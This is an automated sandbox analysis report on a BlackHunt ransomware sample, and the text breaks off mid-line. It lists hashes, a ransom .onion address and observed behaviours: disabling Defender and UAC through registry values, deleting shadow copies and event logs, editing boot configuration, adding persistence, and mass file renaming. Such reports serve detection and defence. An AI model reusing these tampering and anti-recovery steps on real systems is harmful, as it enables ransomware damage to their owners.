Analysis
-
max time kernel
93s -
max time network
98s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:26
Static task
static1
Behavioral task
behavioral1
Sample
a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe
Resource
win10v2004-20231215-en
General
-
Target
a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe
-
Size
707KB
-
MD5
bb9e416952e7a0702cd963895106e9d7
-
SHA1
2c6c287a741e0801d8f191d22d5eb6e9aa8d470a
-
SHA256
a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f
-
SHA512
4ab23492665570daf7add211b0b4fd4fdde27bd07f60adb59880e89fd1c0576279028ef8b77ca7636b69e155fa12ddb736e14eda8115fc3db86159d9fc3459b6
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1H8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWmFh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6168 fsutil.exe 14080 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 6664 wevtutil.exe 13360 wevtutil.exe 7752 wevtutil.exe 7280 wevtutil.exe 7372 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9116 bcdedit.exe 812 bcdedit.exe 7592 bcdedit.exe 5328 bcdedit.exe -
Renames multiple (3373) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 11716 wbadmin.exe 3980 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\J: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\L: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\B: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\X: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\P: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\N: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\U: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\M: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\T: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\Y: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\G: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\R: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\A: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\S: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\H: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\V: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\K: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened (read-only) \??\Z: a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Scan_visual.svg a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\cef\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ar-ae\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jopt-simple.md a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateCCFiles_280x192.svg a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\ui-strings.js a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files\Java\jre-1.8\bin\plugin2\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\ui-strings.js a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ar-ae\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\ui-strings.js a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management-agent.jar a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\css\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\ui-strings.js a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\PlayStore_icon.svg a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Google\Update\Offline\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\java.policy a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#BlackHunt_ReadMe.txt a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\LINEAR_RGB.pf a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\#BlackHunt_Private.key a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\#BlackHunt_ReadMe.hta a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 13892 13744 WerFault.exe 291 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3304 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7312 vssadmin.exe 2244 vssadmin.exe 4248 vssadmin.exe 4896 vssadmin.exe 10508 vssadmin.exe 11472 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2464 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1516 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Token: SeRestorePrivilege 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Token: SeBackupPrivilege 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Token: SeTakeOwnershipPrivilege 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Token: SeAuditPrivilege 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Token: SeSecurityPrivilege 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Token: SeIncBasePriorityPrivilege 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe Token: SeBackupPrivilege 5364 vssvc.exe Token: SeRestorePrivilege 5364 vssvc.exe Token: SeAuditPrivilege 5364 vssvc.exe Token: SeBackupPrivilege 10788 wbengine.exe Token: SeRestorePrivilege 10788 wbengine.exe Token: SeSecurityPrivilege 10788 wbengine.exe Token: SeSecurityPrivilege 7752 wevtutil.exe Token: SeBackupPrivilege 7752 wevtutil.exe Token: SeSecurityPrivilege 7372 wevtutil.exe Token: SeBackupPrivilege 7372 wevtutil.exe Token: SeSecurityPrivilege 7280 wevtutil.exe Token: SeBackupPrivilege 7280 wevtutil.exe Token: SeSecurityPrivilege 6664 wevtutil.exe Token: SeBackupPrivilege 6664 wevtutil.exe Token: SeSecurityPrivilege 13360 wevtutil.exe Token: SeBackupPrivilege 13360 wevtutil.exe Token: SeDebugPrivilege 2464 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2956 wrote to memory of 3320 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 89 PID 2956 wrote to memory of 3320 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 89 PID 2956 wrote to memory of 992 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 91 PID 2956 wrote to memory of 992 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 91 PID 2956 wrote to memory of 3460 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 93 PID 2956 wrote to memory of 3460 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 93 PID 2956 wrote to memory of 1580 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 95 PID 2956 wrote to memory of 1580 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 95 PID 2956 wrote to memory of 2804 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 97 PID 2956 wrote to memory of 2804 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 97 PID 2956 wrote to memory of 3944 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 99 PID 2956 wrote to memory of 3944 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 99 PID 3320 wrote to memory of 4384 3320 cmd.exe 100 PID 3320 wrote to memory of 4384 3320 cmd.exe 100 PID 2956 wrote to memory of 4900 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 102 PID 2956 wrote to memory of 4900 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 102 PID 992 wrote to memory of 4140 992 cmd.exe 164 PID 992 wrote to memory of 4140 992 cmd.exe 164 PID 3460 wrote to memory of 4488 3460 cmd.exe 105 PID 3460 wrote to memory of 4488 3460 cmd.exe 105 PID 2956 wrote to memory of 4576 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 106 PID 2956 wrote to memory of 4576 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 106 PID 2956 wrote to memory of 760 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 183 PID 2956 wrote to memory of 760 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 183 PID 2804 wrote to memory of 2404 2804 cmd.exe 109 PID 2804 wrote to memory of 2404 2804 cmd.exe 109 PID 1580 wrote to memory of 3972 1580 cmd.exe 111 PID 1580 wrote to memory of 3972 1580 cmd.exe 111 PID 3944 wrote to memory of 1904 3944 cmd.exe 112 PID 3944 wrote to memory of 1904 3944 cmd.exe 112 PID 2956 wrote to memory of 2244 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 190 PID 2956 wrote to memory of 2244 2956 a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe 190 PID 4900 wrote to memory of 4264 4900 cmd.exe 114 PID 4900 wrote to 